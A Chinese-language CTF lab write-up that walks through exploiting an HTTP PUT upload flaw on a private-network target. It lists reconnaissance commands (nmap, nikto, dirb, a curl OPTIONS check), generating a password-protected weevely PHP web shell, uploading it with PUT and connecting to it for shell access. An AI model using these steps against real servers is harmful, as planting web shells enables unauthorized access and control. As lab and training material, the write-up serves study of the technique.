【CTF】PUT上传漏洞

kali:192.168.223.131
target:192.168.223.174

通过arp-scan -l获取目标IP为192.168.223.174,nmap扫描一下,只开放22和80端口,80端口只是一张图片

nmap -p- -A 192.168.223.174

image

nikto扫一下

nikto -h http://192.168.223.174

image

dirb同时扫描

dirb http://192.168.223.174

image

发现一个叫test的文件有点问题,但访问后看不出来,看一下当前HTTP允许什么

curl -v -X OPTIONS http://192.168.223.174/test

image

发现当前http允许使用PUT,使用火狐自带的工具Poster

image

进行如下操作,木马选择weevely生成的,下载到Windows

weevely generate 123456 shell.PHP
http://192.168.223.174/test/shell.PHP
Content Type:application/x-PHP
//文件选择之前weevely生成的shell.PHP文件

image

点击PUT,然后返回201状态码即表示成功,此时刷新test目录shell.PHP将跳出来

image

之后weevely连接即可拿到权限

weevely http://192.168.223.174/test/shell.PHP 123456
shell_sh

image

相关文章

Centos系统之Shell编程基础知识
从Export理解Shell环境和变量生存期
linux shell数组变量、类型及规则
Centos编程Shell基本工作原理方案
Centos操作系统编程之Shell 问答录
rsync-linux备份脚本